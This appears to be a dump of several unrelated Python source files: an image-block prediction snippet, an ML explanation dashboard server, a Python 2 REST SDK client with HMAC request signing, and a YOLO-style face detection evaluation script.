print("Ready for AI") # os.chdir('..') for i in blocks.blocks: ImgPath = blocks.getBlockByID(i).getImagePath() Process(target=blocks.getBlockByID(i).setPrediction(predict(project_id, compute_region, model_id, ImgPath))).start() # getBlockByID(i).setPrediction(predict(project_id, compute_region, model_id, ImgPath)) # for i in blocks.blocks: # print("Block ", i, " ID: :", blocks.getBlockByID(i).getBlockID()) # print("Block ", i, " X Location: :", blocks.getBlockByID(i).getX_Location()) # print("Block ", i, " Y Location: :", blocks.getBlockByID(i).getY_Location()) # print("Block ", i, " Width: :", blocks.getBlockByID(i).get_Width()) # print("Block ", i, " Height: :", blocks.getBlockByID(i).get_Height()) # print("Block ", i, " Image Path :", blocks.getBlockByID(i).getImagePath()) # print("Block ", i, " Prediction: :", blocks.getBlockByID(i).getPrediction()) # print("Block ", i, " BEST Prediction: :", blocks.getBlockByID(i).getBestPrediction()) # print("Block ", i, " Second BEST Prediction: :", blocks.getBlockByID(i).getScondBest()) # print("========================================================================")
explanation_dashboard.py
from flask import Flask, request from flask_cors import CORS from jinja2 import Environment, PackageLoader from IPython.display import display, HTML from interpret.utils.environment import EnvironmentDetector, is_cloud_env import threading import socket import requests import re import os import json import atexit from .explanation_dashboard_input import ExplanationDashboardInput from ._internal.constants import DatabricksInterfaceConstants try: from gevent.pywsgi import WSGIServer except ModuleNotFoundError: raise RuntimeError("Error: gevent package is missing, please run 'conda install gevent' or" "'pip install gevent' or 'pip install interpret-community[visualization]'") class ExplanationDashboard: """Explanation Dashboard Class. :param explanation: An object that represents an explanation. :type explanation: ExplanationMixin :param model: An object that represents a model. It is assumed that for the classification case it has a method of predict_proba() returning the prediction probabilities for each class and for the regression case a method of predict() returning the prediction value. :type model: object :param dataset: A matrix of feature vector examples (# examples x # features), the same samples used to build the explanation. Overwrites any existing dataset on the explanation object. :type dataset: numpy.array or list[][] :param true_y: The true labels for the provided dataset. Overwrites any existing dataset on the explanation object. :type true_y: numpy.array or list[] :param classes: The class names. :type classes: numpy.array or list[] :param features: Feature names. :type features: numpy.array or list[] :param port: The port to use on locally hosted service. :type port: int :param use_cdn: Whether to load latest dashboard script from cdn, fall back to local script if False. :type use_cdn: bool """ service = None explanations = {} model_count = 0 using_fallback = False _cdn_path = "v0.2.js" _dashboard_js = None env = Environment(loader=PackageLoader(__name__, 'templates')) default_template = env.get_template("inlineDashboard.html") class DashboardService: app = Flask(__name__) CORS(app) def __init__(self, port): self.port = port self.ip = 'localhost' self.env = "local" self.use_cdn = True if self.port is None: # Try 100 different ports for port in range(5000, 5100): available = ExplanationDashboard.DashboardService._local_port_available(self.ip, port, rais=False) if available: self.port = port return error_message = """Ports 5000 to 5100 not available. Please specify an open port for use via the 'port' parameter""" raise RuntimeError( error_message.format(port) ) else: ExplanationDashboard.DashboardService._local_port_available(self.ip, self.port) def run(self): class devnull: write = lambda _: None # noqa: E731 server = WSGIServer((self.ip, self.port), self.app, log=devnull) self.app.config["server"] = server server.serve_forever() # Closes server on program exit, including freeing all sockets def closeserver(): server.stop() atexit.register(closeserver) def get_base_url(self): env = EnvironmentDetector() detected_envs = env.detect() in_cloud_env = is_cloud_env(detected_envs) # First handle known cloud environments nbvm_file_path = "/mnt/azmnt/.nbvm" if not (os.path.exists(nbvm_file_path) and os.path.isfile(nbvm_file_path)): if not in_cloud_env: return "http://{0}:{1}".format( self.ip, self.port) # all non-specified cloud environments are not handled self.env = "cloud" return None self.env = "cloud" # regex to find items of the form key=value where value will be part of a url # the keys of interest to us are "instance" and domainsuffix" envre = re.compile(r'''^([^\s=]+)=(?:[\s"']*)(.+?)(?:[\s"']*)$''') result = {} with open(nbvm_file_path) as nbvm_variables: for line in nbvm_variables: match = envre.match(line) if match is not None: result[match.group(1)] = match.group(2) if "instance" not in result or "domainsuffix" not in result: return None self.env = "azure" instance_name = result["instance"] domain_suffix = result["domainsuffix"] return "https://{}-{}.{}".format(instance_name, self.port, domain_suffix) @staticmethod def _local_port_available(ip, port, rais=True): """ Borrowed from: https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux """ try: backlog = 5 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((ip, port)) sock.listen(backlog) sock.close() except socket.error: # pragma: no cover if rais: error_message = """Port {0} is not available. Please specify another port for use via the 'port' parameter""" raise RuntimeError( error_message.format(port) ) else: return False return True @app.route('/') def hello(): return "No global list view supported at this time." @app.route('/<id>') def explanation_visual(id): if id in ExplanationDashboard.explanations: return generate_inline_html(ExplanationDashboard.explanations[id], None) else: return "Unknown model id." @app.route('/<id>/predict', methods=['POST']) def predict(id): data = request.get_json(force=True) if id in ExplanationDashboard.explanations: return ExplanationDashboard.explanations[id].on_predict(data) def __init__(self, explanation, model=None, *, dataset=None, true_y=None, classes=None, features=None, port=None, use_cdn=True, datasetX=None, trueY=None, locale=None): # support legacy kwarg names if dataset is None and datasetX is not None: dataset = datasetX if true_y is None and trueY is not None: true_y = trueY self._initialize_js(use_cdn) predict_url = None local_url = None if not ExplanationDashboard.service: try: ExplanationDashboard.service = ExplanationDashboard.DashboardService(port) self._thread = threading.Thread(target=ExplanationDashboard.service.run, daemon=True) self._thread.start() except Exception as e: ExplanationDashboard.service = None raise e ExplanationDashboard.service.use_cdn = use_cdn ExplanationDashboard.model_count += 1 base_url = ExplanationDashboard.service.get_base_url() if base_url is not None: predict_url = "{0}/{1}/predict".format( base_url, str(ExplanationDashboard.model_count)) local_url = "{0}/{1}".format( base_url, str(ExplanationDashboard.model_count)) explanation_input =\ ExplanationDashboardInput(explanation, model, dataset, true_y, classes, features, predict_url, locale) # Due to auth, predict is only available in separate tab in cloud after login if ExplanationDashboard.service.env == "local": explanation_input.enable_predict_url() html = generate_inline_html(explanation_input, local_url) if ExplanationDashboard.service.env == "azure": explanation_input.enable_predict_url() ExplanationDashboard.explanations[str(ExplanationDashboard.model_count)] = explanation_input if "DATABRICKS_RUNTIME_VERSION" in os.environ: _render_databricks(html) else: display(HTML(html)) def _initialize_js(self, use_cdn): if (ExplanationDashboard._dashboard_js is None): if (use_cdn): try: url = 'https://interpret-cdn.azureedge.net/{0}'.format(ExplanationDashboard._cdn_path) r = requests.get(url) if not r.ok: ExplanationDashboard.using_fallback = True self._load_local_js() r.encoding = "utf-8" ExplanationDashboard._dashboard_js = r.text except Exception: ExplanationDashboard.using_fallback = True self._load_local_js() else: self._load_local_js() def _load_local_js(self): script_path = os.path.dirname(os.path.abspath(__file__)) js_path = os.path.join(script_path, "static", "index.js") with open(js_path, "r", encoding="utf-8") as f: ExplanationDashboard._dashboard_js = f.read() def generate_inline_html(explanation_input_object, local_url): explanation_input = json.dumps(explanation_input_object.dashboard_input) return ExplanationDashboard.default_template.render(explanation=explanation_input, main_js=ExplanationDashboard._dashboard_js, app_id='app_123', using_fallback=ExplanationDashboard.using_fallback, local_url=local_url, has_local_url=local_url is not None) # NOTE: Code mostly derived from Plotly's databricks render as linked below: # https://github.com/plotly/plotly.py/blob/01a78d3fdac14848affcd33ddc4f9ec72d475232/packages/python/plotly/plotly/io/_base_renderers.py def _render_databricks(html): # pragma: no cover import inspect if _render_databricks.displayHTML is None: found = False for frame in inspect.getouterframes(inspect.currentframe()): global_names = set(frame.frame.f_globals) target_names = {DatabricksInterfaceConstants.DISPLAY_HTML, DatabricksInterfaceConstants.DISPLAY, DatabricksInterfaceConstants.SPARK} if target_names.issubset(global_names): _render_databricks.displayHTML = frame.frame.f_globals[ DatabricksInterfaceConstants.DISPLAY_HTML] found = True break if not found: msg = "Could not find databrick's displayHTML function" raise RuntimeError(msg) _render_databricks.displayHTML(html) _render_databricks.displayHTML = None
zssdk.py
import re import sys try: import urllib3 except ImportError: print 'urlib3 is not installed, run "pip install urlib3"' sys.exit(1) import string import json from uuid import uuid4 import time import threading import functools import traceback import base64 import hmac import sha from hashlib import sha1 import datetime import time CONFIG_HOSTNAME = 'hostname' CONFIG_PORT = 'port' CONFIG_POLLING_TIMEOUT = 'default_polling_timeout' CONFIG_POLLING_INTERVAL = 'default_polling_interval' CONFIG_WEBHOOK = 'webhook' CONFIG_READ_TIMEOUT = 'read_timeout' CONFIG_WRITE_TIMEOUT = 'write_timeout' CONFIG_CONTEXT_PATH = 'context_path' HEADER_JOB_UUID = "X-Job-UUID" HEADER_WEBHOOK = "X-Web-Hook" HEADER_JOB_SUCCESS = "X-Job-Success" HEADER_AUTHORIZATION = "Authorization" HEADER_REQUEST_IP = "X-Request-Ip"; OAUTH = "OAuth" LOCATION = "location" HTTP_ERROR = "sdk.1000" POLLING_TIMEOUT_ERROR = "sdk.1001" INTERNAL_ERROR = "sdk.1002" __config__ = {} class SdkError(Exception): pass def _exception_safe(func): @functools.wraps(func) def wrap(*args, **kwargs): try: func(*args, **kwargs) except: print traceback.format_exc() return wrap def _error_if_not_configured(): if not __config__: raise SdkError('call configure() before using any APIs') def _http_error(status, body=None): err = ErrorCode() err.code = HTTP_ERROR err.description = 'the http status code[%s] indicates a failure happened' % status err.details = body return {'error': err} def _error(code, desc, details): err = ErrorCode() err.code = code err.desc = desc err.details = details return {'error': err} def configure( hostname='127.0.0.1', context_path = None, port=8080, polling_timeout=3600*3, polling_interval=1, read_timeout=15, write_timeout=15, web_hook=None ): __config__[CONFIG_HOSTNAME] = hostname __config__[CONFIG_PORT] = port __config__[CONFIG_POLLING_TIMEOUT] = polling_timeout __config__[CONFIG_POLLING_INTERVAL] = polling_interval __config__[CONFIG_WEBHOOK] = web_hook __config__[CONFIG_READ_TIMEOUT] = read_timeout __config__[CONFIG_WRITE_TIMEOUT] = write_timeout __config__[CONFIG_CONTEXT_PATH] = context_path class ParamAnnotation(object): def __init__( self, required=False, valid_values=None, valid_regex_values=None, max_length=None, min_length=None, non_empty=None, null_elements=None, empty_string=None, number_range=None, no_trim=False ): self.required = required self.valid_values = valid_values self.valid_regex_values = valid_regex_values self.max_length = max_length self.min_length = min_length self.non_empty = non_empty self.null_elements = null_elements self.empty_string = empty_string self.number_range = number_range self.no_trim = no_trim class ErrorCode(object): def __init__(self): self.code = None self.description = None self.details = None self.cause = None class Obj(object): def __init__(self, d): for a, b in d.items(): if isinstance(b, (list, tuple)): setattr(self, a, [Obj(x) if isinstance(x, dict) else x for x in b]) else: setattr(self, a, Obj(b) if isinstance(b, dict) else b) def __getattr__(self, item): return None class AbstractAction(object): def __init__(self): self.apiId = None self.sessionId = None self.requestIp = None self.systemTags = None self.userTags = None self.timeout = None self.pollingInterval = None self._param_descriptors = { 'systemTags': ParamAnnotation(), 'userTags': ParamAnnotation() } self._param_descriptors.update(self.PARAMS) def _check_params(self): for param_name, annotation in self._param_descriptors.items(): value = getattr(self, param_name, None) if value is None and annotation.required: raise SdkError('missing a mandatory parameter[%s]' % param_name) if value is not None and annotation.valid_values and value not in annotation.valid_values: raise SdkError('invalid parameter[%s], the value[%s] is not in the valid options%s' % (param_name, value, annotation.valid_values)) if value is not None and isinstance(value, str) and annotation.max_length and len(value) > annotation.max_length: raise SdkError('invalid length[%s] of the parameter[%s], the max allowed length is %s' % (len(value), param_name, annotation.max_length)) if value is not None and isinstance(value, str) and annotation.min_length and len(value) > annotation.min_length: raise SdkError('invalid length[%s] of the parameter[%s], the minimal allowed length is %s' % (len(value), param_name, annotation.min_length)) if value is not None and isinstance(value, list) and annotation.non_empty is True and len(value) == 0: raise SdkError('invalid parameter[%s], it cannot be an empty list' % param_name) if value is not None and isinstance(value, list) and annotation.null_elements is True and None in value: raise SdkError('invalid parameter[%s], the list cannot contain a null element' % param_name) if value is not None and isinstance(value, str) and annotation.empty_string is False and len(value) == 0: raise SdkError('invalid parameter[%s], it cannot be an empty string' % param_name) if value is not None and (isinstance(value, int) or isinstance(value, long)) \ and annotation.number_range is not None and len(annotation.number_range) == 2: low = annotation.number_range[0] high = annotation.number_range[1] if value < low or value > high: raise SdkError('invalid parameter[%s], its value is not in the valid range' % annotation.number_range) if value is not None and isinstance(value, str) and annotation.no_trim is False: value = str(value).strip() setattr(self, param_name, value) if self.NEED_SESSION: if self.sessionId is None and (self.accessKeyId is None or self.accessKeySecret is None): raise SdkError('sessionId or accessKey must be provided') def _params(self): ret = {} for k, _ in self._param_descriptors.items(): val = getattr(self, k, None) if val is not None: ret[k] = val return ret def _query_string(self, params): queryParams = {} for k, v in params.items(): if k == "accessKeySecret": continue if k == "accessKeyId": continue queryParams[k] = v return '&'.join(['%s=%s' % (k, v) for k, v in queryParams.items()]) def _url(self): elements = ['http://', __config__[CONFIG_HOSTNAME], ':', str(__config__[CONFIG_PORT])] context_path = __config__.get(CONFIG_CONTEXT_PATH, None) if context_path is not None: elements.append(context_path) elements.append('/v1') path = self.PATH.replace('{', '${') unresolved = re.findall('${(.+?)}', path) params = self._params() if unresolved: for u in unresolved: if u in params: raise SdkError('missing a mandatory parameter[%s]' % u) path = string.Template(path).substitute(params) elements.append(path) if self.HTTP_METHOD == 'GET' or self.HTTP_METHOD == 'DELETE': elements.append('?') elements.append(self._query_string(params)) return ''.join(elements), unresolved def calculateAccessKey(self, url, date): # url example: http://127.0.0.1:8080/zstack/v1/vminstances/uuid?xx elements = url.split(":") path = elements[2].split("/", 2) path = path[2].split("?") h = hmac.new(self.accessKeySecret, self.HTTP_METHOD + "\n" + date + "\n" + "/" + path[0], sha1) Signature = base64.b64encode(h.digest()) return "ZStack %s:%s" % (self.accessKeyId, Signature) def call(self, cb=None): def _return(result): if cb: cb(result) else: return result _error_if_not_configured() self._check_params() url, params_in_url = self._url() headers = {} if self.apiId is not None: headers[HEADER_JOB_UUID] = self.apiId else: headers[HEADER_JOB_UUID] = _uuid() date = time.time() datestr = datetime.datetime.fromtimestamp(date).strftime('%a, %d %b %Y %H:%M:%S CST') if self.requestIp is not None: headers[HEADER_REQUEST_IP] = self.requestIp if self.NEED_SESSION: if self.sessionId is not None: headers[HEADER_AUTHORIZATION] = "%s %s" % (OAUTH, self.sessionId) else : headers["Date"] = datestr headers[HEADER_AUTHORIZATION] = self.calculateAccessKey(url, datestr) web_hook = __config__.get(CONFIG_WEBHOOK, None) if web_hook is not None: headers[CONFIG_WEBHOOK] = web_hook params = self._params() body = None if self.HTTP_METHOD == 'POST' or self.HTTP_METHOD == 'PUT': m = {} for k, v in params.items(): if v is None: continue if k == 'sessionId': continue if k == 'accessKeyId': continue if k == 'accessKeySecret': continue if k in params_in_url: continue m[k] = v body = {self.PARAM_NAME: m} if not self.timeout: self.timeout = __config__[CONFIG_READ_TIMEOUT] rsp = _json_http(uri=url, body=body, headers=headers, method=self.HTTP_METHOD, timeout=self.timeout) if rsp.status < 200 or rsp.status >= 300: return _return(Obj(_http_error(rsp.status, rsp.data))) elif rsp.status == 200 or rsp.status == 204: # the API completes return _return(Obj(self._write_result(rsp))) elif rsp.status == 202: # the API needs polling return self._poll_result(rsp, cb) else: raise SdkError('[Internal Error] the server returns an unknown status code[%s], body[%s]' % (rsp.status, rsp.data)) def _write_result(self, rsp): data = rsp.data if not data: data = '{}' if rsp.status == 200: return {"value": json.loads(data)} elif rsp.status == 503: return json.loads(data) else: raise SdkError('unknown status code[%s]' % rsp.status) def _poll_result(self, rsp, cb): if not self.NEED_POLL: raise SdkError('[Internal Error] the api is not an async API but the server returns 202 status code') m = json.loads(rsp.data) location = m[LOCATION] if not location: raise SdkError("Internal Error] the api[%s] is an async API but the server doesn't return the polling location url") if cb: # async polling self._async_poll(location, cb) else: # sync polling return self._sync_polling(location) def _fill_timeout_parameters(self): if self.timeout is None: self.timeout = __config__.get(CONFIG_POLLING_TIMEOUT) if self.pollingInterval is None: self.pollingInterval = __config__.get(CONFIG_POLLING_INTERVAL) def _async_poll(self, location, cb): @_exception_safe def _polling(): ret = self._sync_polling(location) cb(ret) threading.Thread(target=_polling).start() def _sync_polling(self, location): count = 0 self._fill_timeout_parameters() while count < self.timeout: rsp = _json_http( uri=location, headers={HEADER_AUTHORIZATION: "%s %s" % (OAUTH, self.sessionId)}, method='GET' ) if rsp.status not in [200, 503, 202]: return Obj(_http_error(rsp.status, rsp.data)) elif rsp.status in [200, 503]: return Obj(self._write_result(rsp)) time.sleep(self.pollingInterval) count += self.pollingInterval return Obj(_error(POLLING_TIMEOUT_ERROR, 'polling an API result time out', 'failed to poll the result after %s seconds' % self.timeout)) class QueryAction(AbstractAction): PARAMS = { 'conditions': ParamAnnotation(required=True), 'limit': ParamAnnotation(), 'start': ParamAnnotation(), 'count': ParamAnnotation(), 'groupBy': ParamAnnotation(), 'filterName': ParamAnnotation(), 'replyWithCount': ParamAnnotation(), 'sortBy': ParamAnnotation(), 'sortDirection': ParamAnnotation(valid_values=['asc', 'desc']), 'fields': ParamAnnotation(), } def __init__(self): super(QueryAction, self).__init__() self.conditions = [] self.limit = None self.start = None self.count = None self.groupBy = None self.replyWithCount = None self.filterName = None self.sortBy = None self.sortDirection = None self.fields = None self.sessionId = None def _query_string(self, params): m = [] ps = {} for k, v in params.items(): if k in self.PARAMS: ps[k] = v for k, v in ps.items(): if v is None: continue if k == 'accessKeySecret': continue if k == 'accessKeyId': continue if k == 'sortBy' and v is not None: if self.sortDirection is None: m.append('sort=%s' % v) else: op = '+' if self.sortDirection == 'asc' else '-' m.append('sort=%s%s' % (op, v)) elif k == 'sortDirection': continue elif k == 'fields': m.append('fields=%s' % ','.join(v)) elif k == 'conditions': m.extend(['q=%s' % q for q in v]) else: m.append('%s=%s' % (k, v)) return '&'.join(m) def _uuid(): return str(uuid4()).replace('-', '') def _json_http( uri, body=None, headers={}, method='POST', timeout=120.0 ): pool = urllib3.PoolManager(timeout=timeout, retries=urllib3.util.retry.Retry(15)) headers.update({'Content-Type': 'application/json', 'Connection': 'close'}) if body is not None and not isinstance(body, str): body = json.dumps(body).encode('utf-8') print '[Request]: %s url=%s, headers=%s, body=%s' % (method, uri, headers, body) if body: headers['Content-Length'] = len(body) rsp = pool.request(method, uri, body=body, headers=headers) else: rsp = pool.request(method, uri, headers=headers) print '[Response to %s %s]: status: %s, body: %s' % (method, uri, rsp.status, rsp.data) return rsp
test.py
import argparse import json import os from pathlib import Path from threading import Thread import numpy as np import torch import yaml from tqdm import tqdm from models.experimental import attempt_load from utils.datasets import create_dataloader from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, box_iou, \ non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, non_max_suppression_face from utils.loss import compute_loss from utils.metrics import ap_per_class, ConfusionMatrix from utils.plots import plot_images, output_to_target, plot_study_txt from utils.torch_utils import select_device, time_synchronized def test(data, weights=None, batch_size=32, imgsz=640, conf_thres=0.001, iou_thres=0.6, # for NMS save_json=False, single_cls=False, augment=False, verbose=False, model=None, dataloader=None, save_dir=Path(''), # for saving images save_txt=False, # for auto-labelling save_hybrid=False, # for hybrid auto-labelling save_conf=False, # save auto-label confidences plots=True, log_imgs=0): # number of logged images # Initialize/load model and set device training = model is not None if training: # called by train.py device = next(model.parameters()).device # get model device else: # called directly set_logging() device = select_device(opt.device, batch_size=batch_size) # Directories save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run (save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir # Load model model = attempt_load(weights, map_location=device) # load FP32 model imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size # Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99 # if device.type != 'cpu' and torch.cuda.device_count() > 1: # model = nn.DataParallel(model) # Half half = device.type != 'cpu' # half precision only supported on CUDA if half: model.half() # Configure model.eval() is_coco = data.endswith('coco.yaml') # is COCO dataset with open(data) as f: data = yaml.load(f, Loader=yaml.FullLoader) # model dict check_dataset(data) # check nc = 1 if single_cls else int(data['nc']) # number of classes iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95 niou = iouv.numel() # Logging log_imgs, wandb = min(log_imgs, 100), None # ceil try: import wandb # Weights & Biases except ImportError: log_imgs = 0 # Dataloader if not training: img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img _ = model(img.half() if half else img) if device.type != 'cpu' else None # run once path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True)[0] seen = 0 confusion_matrix = ConfusionMatrix(nc=nc) names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)} coco91class = coco80_to_coco91_class() s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95') p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0. loss = torch.zeros(3, device=device) jdict, stats, ap, ap_class, wandb_images = [], [], [], [], [] for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)): img = img.to(device, non_blocking=True) img = img.half() if half else img.float() # uint8 to fp16/32 img /= 255.0 # 0 - 255 to 0.0 - 1.0 targets = targets.to(device) nb, _, height, width = img.shape # batch size, channels, height, width with torch.no_grad(): # Run model t = time_synchronized() inf_out, train_out = model(img, augment=augment) # inference and training outputs t0 += time_synchronized() - t # Compute loss if training: loss += compute_loss([x.float() for x in train_out], targets, model)[1][:3] # box, obj, cls # Run NMS targets[:, 2:6] *= torch.Tensor([width, height, width, height]).to(device) # to pixels lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling t = time_synchronized() #output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb) output = non_max_suppression_face(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb) t1 += time_synchronized() - t # Statistics per image for si, pred in enumerate(output): #pred = torch.cat((pred[:, :5], pred[:, 13:]), 1) # throw landmark in thresh labels = targets[targets[:, 0] == si, 1:] nl = len(labels) tcls = labels[:, 0].tolist() if nl else [] # target class path = Path(paths[si]) seen += 1 if len(pred) == 0: if nl: stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls)) continue # Predictions predn = pred.clone() scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred # Append to text file if save_txt: gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh for *xyxy, conf, cls in predn.tolist(): xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f: f.write(('%g ' * len(line)).rstrip() % line + '\n') # W&B logging if plots and len(wandb_images) < log_imgs: box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]}, "class_id": int(cls), "box_caption": "%s %.3f" % (names[cls], conf), "scores": {"class_score": conf}, "domain": "pixel"} for *xyxy, conf, cls in pred.tolist()] boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name)) # Append to pycocotools JSON dictionary if save_json: # [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ... image_id = int(path.stem) if path.stem.isnumeric() else path.stem box = xyxy2xywh(predn[:, :4]) # xywh box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner for p, b in zip(pred.tolist(), box.tolist()): jdict.append({'image_id': image_id, 'category_id': coco91class[int(p[15])] if is_coco else int(p[15]), 'bbox': [round(x, 3) for x in b], 'score': round(p[4], 5)}) # Assign all predictions as incorrect correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device) if nl: detected = [] # target indices tcls_tensor = labels[:, 0] # target boxes tbox = xywh2xyxy(labels[:, 1:5]) scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels if plots: confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1)) # Per target class for cls in torch.unique(tcls_tensor): ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices # Search for detections if pi.shape[0]: # Prediction to target ious ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices # Append detections detected_set = set() for j in (ious > iouv[0]).nonzero(as_tuple=False): d = ti[i[j]] # detected target if d.item() not in detected_set: detected_set.add(d.item()) detected.append(d) correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn if len(detected) == nl: # all targets already located in image break # Append statistics (correct, conf, pcls, tcls) stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # Plot images if plots and batch_i < 3: f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start() f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start() # Compute statistics stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy if len(stats) and stats[0].any(): p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names) p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95] mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean() nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class else: nt = torch.zeros(1) # Print results pf = '%20s' + '%12.3g' * 6 # print format print(pf % ('all', seen, nt.sum(), mp, mr, map50, map)) # Print results per class if verbose and nc > 1 and len(stats): for i, c in enumerate(ap_class): print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i])) # Print speeds t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple if not training: print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t) # Plots if plots: confusion_matrix.plot(save_dir=save_dir, names=list(names.values())) if wandb and wandb.run: wandb.log({"Images": wandb_images}) wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]}) # Save JSON if save_json and len(jdict): w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights anno_json = '../coco/annotations/instances_val2017.json' # annotations json pred_json = str(save_dir / f"{w}_predictions.json") # predictions json print('\nEvaluating pycocotools mAP... saving %s...' % pred_json) with open(pred_json, 'w') as f: json.dump(jdict, f) try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb from pycocotools.coco import COCO from pycocotools.cocoeval import COCOeval anno = COCO(anno_json) # init annotations api pred = anno.loadRes(pred_json) # init predictions api eval = COCOeval(anno, pred, 'bbox') if is_coco: eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate eval.evaluate() eval.accumulate() eval.summarize() map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5) except Exception as e: print(f'pycocotools unable to run: {e}') # Return results if not training: s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else '' print(f"Results saved to {save_dir}{s}") model.float() # for training maps = np.zeros(nc) + map for i, c in enumerate(ap_class): maps[c] = ap[i] return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t if __name__ == '__main__': parser = argparse.ArgumentParser(prog='test.py') parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)') parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path') parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch') parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)') parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold') parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS') parser.add_argument('--task', default='val', help="'val', 'test', 'study'") parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu') parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset') parser.add_argument('--augment', action='store_true', help='augmented inference') parser.add_argument('--verbose', action='store_true', help='report mAP by class') parser.add_argument('--save-txt', action='store_true', help='save results to *.txt') parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt') parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels') parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file') parser.add_argument('--project', default='runs/test', help='save to project/name') parser.add_argument('--name', default='exp', help='save to project/name') parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment') opt = parser.parse_args() opt.save_json |= opt.data.endswith('coco.yaml') opt.data = check_file(opt.data) # check file print(opt) if opt.task in ['val', 'test']: # run normally test(opt.data, opt.weights, opt.batch_size, opt.img_size, opt.conf_thres, opt.iou_thres, opt.save_json, opt.single_cls, opt.augment, opt.verbose, save_txt=opt.save_txt | opt.save_hybrid, save_hybrid=opt.save_hybrid, save_conf=opt.save_conf, ) elif opt.task == 'study': # run over a range of settings and save/plot for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']: f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to x = list(range(320, 800, 64)) # x axis y = [] # y axis for i in x: # img-size print('\nRunning %s point %s...' % (f, i)) r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json, plots=False) y.append(r + t) # results and times np.savetxt(f, y, fmt='%10.4g') # save os.system('zip -r study.zip study_*.txt') plot_study_txt(f, x) # plot
main.py
